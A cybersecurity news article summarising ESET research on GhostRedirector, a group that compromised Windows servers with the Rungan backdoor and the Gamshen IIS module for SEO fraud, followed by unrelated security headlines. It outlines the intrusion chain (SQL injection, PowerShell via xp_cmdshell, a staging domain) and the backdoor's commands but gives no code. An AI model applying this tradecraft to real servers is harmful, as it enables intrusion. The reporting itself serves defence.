GhostRedirector compromises Windows servers utilizing Rungan backdoor and Gamshen IIS module

Cybersecurity researchers have uncovered a previously undocumented threat cluster known as GhostRedirector, which has compromised at least 65 Windows servers, primarily located in Brazil, Thailand, and Vietnam. According to Slovak cybersecurity company ESET, the attacks have resulted in the deployment of a passive C++ backdoor named Rungan and a native Internet Information Services (IIS) module referred to as Gamshen. The threat actor is believed to have been active since at least August 2024.

Rungan possesses the capability to execute commands on a compromised server, while Gamshen is designed to provide SEO fraud as-a-service, manipulating search engine results to enhance the page ranking of a targeted website. ESET researcher Fernando Tavella noted that Gamshen modifies responses only when requests originate from Googlebot, meaning it does not serve malicious content to regular visitors. However, involvement in the SEO fraud scheme can damage the reputation of the compromised host website by associating it with dubious SEO practices. The hacking group has also targeted entities in Peru, the United States, Canada, Finland, India, the Netherlands, the Philippines, and Singapore, with indiscriminate activity affecting sectors such as education, healthcare, insurance, transportation, technology, and retail.

Initial access to target networks is achieved by exploiting a vulnerability, likely an SQL injection flaw, followed by the use of PowerShell to deliver additional tools hosted on a staging server identified as “868id[.]com.” ESET’s observations indicate that most unauthorised PowerShell executions originated from the binary sqlserver.exe, which contains a stored procedure, xp_cmdshell, that can execute commands on a machine. Rungan is programmed to await incoming requests from a specific URL pattern and can parse and execute embedded commands. It supports four commands: mkuser, to create a user on the server; listfolder, to collect information from a specified path; addurl, to register new URLs for the backdoor; and cmd, to run a command on the server using pipes and the CreateProcessA API. Written in C/C++, Gamshen is part of an IIS malware family known as “Group 13,” which can function as both a backdoor and a tool for SEO fraud. It operates similarly to IISerpent, another IIS-specific malware documented by ESET in August 2021, which intercepts HTTP requests from search engine crawlers to alter server responses.

GhostRedirector compromises Windows servers utilizing Rungan backdoor and Gamshen IIS module

SonicWall has verified that there are no new zero-day vulnerabilities in SSLVPN, stating that the recent ransomware attack is associated with an older vulnerability.

Researchers have observed a significant increase in remote code execution (RCE) exploits targeting the Erlang/OTP SSH protocol, with 70% of these attacks aimed at operational technology (OT) firewalls.

A recent report shows that AI has reduced the workloads for virtual Chief Information Security Officers (vCISOs) by 68%, responding to the increasing demands from small and medium-sized businesses (SMBs).

Leaked Credentials Increase by 160%: Exploits Utilized by Attackers

Google announces Android pKVM framework SESIP Level 5 certification

Share this:

Similar Posts